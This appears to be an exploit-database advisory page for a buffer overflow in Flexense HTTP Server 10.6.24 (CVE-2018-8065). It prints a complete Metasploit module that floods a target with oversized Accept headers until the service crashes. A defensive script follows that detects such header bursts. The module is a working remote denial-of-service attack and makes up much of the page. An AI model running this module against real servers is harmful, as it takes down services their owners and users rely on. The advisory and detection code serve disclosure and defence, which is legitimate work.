Flexense HTTP Server 10.6.24 Buffer Overflow / Denial Of Service

Published: 01 Jun 2023 00:00:00
Reported by: Ege Balci, metasploit.com
Type: packetstorm
Source: packetstormsecurity.com

A buffer overflow / denial of service vulnerability in Flexense HTTP Server 10.6.24, caused by a user-mode write access memory violation when the server handles long HTTP header values. It can be triggered by sending a variety of HTTP requests. Multiple applications that use the vulnerable server are reported to be affected.

Related

| Reporter | Title | Published | Family |
| --- | --- | --- | --- |
| 0day.today | Flexense HTTP Server 10.6.24 - Buffer Overflow Exploit | 31 May 2023 00:00 | zdt |
| Circl | CVE-2018-8065 | 31 May 2018 20:06 | circl |
| CNVD | Flexense SyncBreeze Enterprise Denial of Service Vulnerability | 12 Mar 2018 00:00 | cnvd |
| CVE | CVE-2018-8065 | 12 Mar 2018 00:00 | cve |
| Cvelist | CVE-2018-8065 | 12 Mar 2018 00:00 | cvelist |
| GithubExploit | Exploit for Improper Input Validation in Flexense Syncbreeze | 25 May 2018 17:31 | githubexploit |
| Exploit DB | Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit) | 31 May 2023 00:00 | exploitdb |
| Metasploit | Flexense HTTP Server Denial Of Service | 25 May 2018 17:22 | metasploit |
| NVD | CVE-2018-8065 | 12 Mar 2018 04:29 | nvd |
| OSV | CVE-2018-8065 | 12 Mar 2018 04:29 | osv |

```ruby
##
# Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)
# Date: 2018-03-09
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.flexense.com/downloads.html
# Version: <= 10.6.24
# CVE : CVE-2018-8065

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Flexense HTTP Server Denial Of Service',
      'Description' => %q{
        This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
        The vulnerability is caused by a user mode write access memory violation and can be
        triggered by rapidly sending a variety of HTTP requests with long HTTP header values.

        Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions are reportedly vulnerable.
      },
      'Author' => [ 'Ege Balci <[email protected]>' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2018-8065'],
          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
        ],
      'DisclosureDate' => '2018-03-09'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)", 1725 ]),
        OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090)", rand(4088..5090) ])
      ])
  end

  # Banner check: reports Appears only when the response carries the
  # exact 'Flexense HTTP Server v10.6.24' string.
  def check
    begin
      connect
      sock.put("GET / HTTP/1.0\r\n\r\n")
      res = sock.get
      if res and res.include? 'Flexense HTTP Server v10.6.24'
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    rescue Rex::ConnectionRefused
      print_error("Target refused the connection")
      Exploit::CheckCode::Unknown
    rescue
      print_error("Target did not respond to HTTP request")
      Exploit::CheckCode::Unknown
    end
  end

  def run
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    size = datastore['PacketSize'].to_i
    print_status("Starting with packets of #{size}-byte strings")

    count = 0
    loop do
      # Each request carries an Accept header value of `size` bytes.
      payload = ""
      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
      payload << "Host: 127.0.0.1\r\n"
      payload << "Accept: "+('A' * size)+"\r\n"
      payload << "\r\n\r\n"
      begin
        connect
        sock.put(payload)
        disconnect
        count += 1
        # PacketCount is registered as an OptString, so convert before comparing.
        break if count == datastore['PacketCount'].to_i
      rescue ::Rex::InvalidDestination
        print_error('Invalid destination! Continuing...')
      rescue ::Rex::ConnectionTimeout
        print_error('Connection timeout! Continuing...')
      rescue ::Errno::ECONNRESET
        print_error('Connection reset! Continuing...')
      rescue ::Rex::ConnectionRefused
        # A refused connection means the service is no longer listening.
        print_good("DoS successful after #{count} packets with #{size}-byte headers")
        return true
      end
    end
    print_error("DoS failed after #{count} packets of #{size}-byte strings")
  end
end
```
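For defenders, the traffic this module produces (many requests from one source, each with a header value in the 4088-5090 byte range) is easy to spot at a proxy or sensor. The following is an added example, not part of the advisory or the Metasploit project; the thresholds, function names and sample traffic are assumptions constructed for illustration.

```ruby
# Added defensive example: flag sources sending bursts of HTTP requests
# whose header values are oversized. All thresholds are assumptions to tune.
MAX_HEADER_VALUE = 4000  # bytes; the module's Accept values are 4088-5090
BURST_COUNT      = 20    # oversized requests from one source ...
BURST_WINDOW     = 10.0  # ... within this many seconds

# Return [name, byte_length] of the longest header value in a raw request.
def longest_header(raw)
  head = raw.split("\r\n\r\n", 2).first.to_s
  fields = head.split("\r\n").drop(1).filter_map do |line|
    name, value = line.split(':', 2)
    [name.strip, value.strip.bytesize] if value
  end
  fields.max_by { |_, len| len } || [nil, 0]
end

# events: array of [timestamp_seconds, source_ip, raw_request].
# Returns { source_ip => peak oversized requests seen in any window }.
def oversized_header_bursts(events)
  hits = Hash.new { |h, k| h[k] = [] }
  events.each do |ts, src, raw|
    hits[src] << ts if longest_header(raw)[1] >= MAX_HEADER_VALUE
  end
  hits.each_with_object({}) do |(src, times), out|
    times.sort!
    peak = start = 0
    times.each_with_index do |t, i|
      start += 1 while t - times[start] > BURST_WINDOW  # slide window start
      peak = [peak, i - start + 1].max
    end
    out[src] = peak if peak >= BURST_COUNT
  end
end

# Constructed sample traffic (documentation addresses, not a real capture).
def sample_events
  req = ->(hdr) { "GET / HTTP/1.1\r\nHost: example.test\r\n#{hdr}\r\n\r\n" }
  burst  = (0...30).map { |i| [i * 0.1, '192.0.2.10', req.("Accept: #{'A' * 4500}")] }
  normal = (0...30).map { |i| [i * 0.1, '198.51.100.7', req.('Accept: text/html')] }
  single = [[1.0, '203.0.113.5', req.("Cookie: #{'c' * 4200}")]]
  burst + normal + single
end

p oversized_header_bursts(sample_events) if __FILE__ == $PROGRAM_NAME
```

A single large header (such as a long cookie) is not flagged on its own; only a source that repeats oversized headers inside the window is reported.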

Scores (01 Jun 2023 00:00, current):
Vulners AI Score: 7.1 (High risk)
CVSS 2: 5
CVSS 3: 7.5
EPSS: 0.79631